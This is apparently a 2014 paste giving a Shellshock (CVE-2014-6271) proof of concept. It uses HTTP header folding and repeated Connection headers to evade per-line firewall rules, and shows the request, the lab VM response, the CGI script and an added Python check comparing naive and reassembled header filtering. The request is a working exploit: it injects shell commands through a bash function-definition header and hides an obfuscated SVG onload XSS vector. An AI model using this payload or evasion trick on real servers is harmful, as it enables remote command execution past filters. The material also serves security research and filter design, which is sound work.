cve-2014-6271 PoC by using HHP - @irsdl

a guest, Sep 26th, 2014
~~ cve-2014-6271 PoC by Using HTTP Header Pollution (HHP) to Bypass Some Firewall Rules ~~
By Soroush Dalili (@irsdl)
Based on a vulnerable sample: VM downloadable from http://files.pentesterlab.com/cve-2014-6271/cve-2014-6271.iso

Note 1: Space characters are important (the leading spaces on the continuation lines are part of the trick)
Note 2: It can also hide other vectors, such as "'<'s'v'g' o'n'l'o'a'd'='a'l'e'r't'('1')' '>' " - just interesting
Note 3: Look at the request "<<WHY? Look @ ENV>> " and its response "Look @ ENV >> , <<WHY? & WHY?" - also interesting
Note 4: Didn't have any actual live firewall to test this on a live product!!!

[Request:]
------------
GET /cgi-bin/status HTTP/1.1
HOST: test
Connection:    
 ()
 {<<WHY? Look @ ENV>>
abcd: A
Connection: &};echo "
abcd: B
Connection: GoesToResponseBody"'<'s'v'g' o'n'l'o'a'd'='a'l'e'r't'('1')' '>' "
abcd: C
Connection: "&echo
 -e "GoesToResponseHeader\x3a@IRSDL"


------------

[Response:]
------------
HTTP/1.1 200 OK
Date: Fri, 26 Sep 2014 00:51:50 GMT
Server: Apache/2.2.21 (Unix) DAV/2
GoesToResponseHeader: @IRSDL
Content-Type: application/json
Content-Length: 859

, GoesToResponseBody<svg onload=alert(1) > ,
{ "uptime": " 00:51:50 up 12:09, 1 users, load average: 0.00, 0.01, 0.04", "kernel": "Linux vulnerable 3.14.1-pentesterlab #1 SMP Sun Jul 6 09:16:00 EST 2014 i686 GNU/Linux"}

SERVER_SIGNATURE= HTTP_ABCD=A, B, C UNIQUE_ID=VCS4pn8AAAEAAANqBIIAAACU SERVER_PORT=80 HTTP_HOST=test DOCUMENT_ROOT=/var/www/ SCRIPT_FILENAME=/var/www/cgi-bin/status REQUEST_URI=/cgi-bin/status SCRIPT_NAME=/cgi-bin/status REMOTE_PORT=38403 PATH=/usr/local/sbin:/usr/local/bin:/sbin:/usr/sbin:/bin:/usr/bin PWD=/var/www/cgi-bin SERVER_ADMIN=louis@pentesterlab.com REMOTE_ADDR=192.168.1.1 SHLVL=1 SERVER_NAME=test SERVER_SOFTWARE=Apache/2.2.21 (Unix) DAV/2 QUERY_STRING= SERVER_ADDR=192.168.1.132 GATEWAY_INTERFACE=CGI/1.1 SERVER_PROTOCOL=HTTP/1.1 REQUEST_METHOD=GET HTTP_CONNECTION=() { Look @ ENV >> , <<WHY? & WHY? } _=/usr/bin/env

------------

[cgi-bin/status source code:]
------------
#!/bin/bash

echo "Content-Type: application/json";
echo ""
echo '{ "uptime": "'`uptime`'", "kernel": "'`uname -a`'"} '
# the lines below were added to the sample for this PoC, to dump the CGI environment
echo ""
echo $(env)
------------
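The bypass works because a filter that inspects each header line on its own never sees "()" and "{" together, while the CGI gateway unfolds the continuation lines and merges the repeated Connection headers with ", " (as HTTP_ABCD=A, B, C in the env dump shows) before bash ever looks at the value. The following Python is an added example, not part of the paste: it rebuilds that merged view for a constructed request of the same shape and checks it for the function-definition prefix, so a per-line check and a reassembled check can be compared.

```python
import re

# Pre-patch bash treats an imported variable whose value begins with the literal
# prefix "() {" as a function definition; kept a little looser than bash here.
SHELLSHOCK_RE = re.compile(r"^\(\)\s+\{")
LINE_RE = re.compile(r"\(\)\s*\{")  # unanchored, as a per-line filter might use

# Constructed request modelled on the paste: "()" and "{" sit on obs-fold
# continuation lines of an empty Connection header, the rest of the function
# arrives in a second Connection header, and an unrelated header sits between.
SAMPLE_REQUEST = (
    "GET /cgi-bin/status HTTP/1.1\r\n"
    "Host: test\r\n"
    "Connection:    \r\n"
    " ()\r\n"
    " { :\r\n"
    "abcd: A\r\n"
    "Connection: &}; echo vulnerable\r\n"
    "abcd: B\r\n"
    "\r\n"
)

def raw_header_lines(request):
    """Header lines exactly as a line-by-line filter would see them."""
    return request.split("\r\n\r\n", 1)[0].split("\r\n")[1:]

def cgi_environment(request):
    """Rebuild HTTP_* variables as the CGI gateway in the paste did: obs-fold lines
    are appended to the preceding field, repeated headers are joined with ', '."""
    unfolded = []
    for line in raw_header_lines(request):
        if line[:1] in (" ", "\t") and unfolded:
            unfolded[-1] += line            # obs-fold: leading space is kept
        else:
            unfolded.append(line)
    env = {}
    for field in unfolded:
        name, _, value = field.partition(":")
        key = "HTTP_" + name.strip().upper().replace("-", "_")
        value = value.strip(" \t")
        env[key] = env[key] + ", " + value if key in env else value
    return env

def naive_line_check(request):
    """Per-line matching never sees "()" and "{" together, so it misses."""
    return any(LINE_RE.search(line) for line in raw_header_lines(request))

def cgi_view_check(request):
    """Match against the reassembled values the CGI script actually receives."""
    return any(SHELLSHOCK_RE.search(v) for v in cgi_environment(request).values())
```

For the sample request the merged HTTP_CONNECTION value is "() { :, &}; echo vulnerable", which naive_line_check misses and cgi_view_check flags; the lesson for a filter is to normalise headers the same way the backend does before matching.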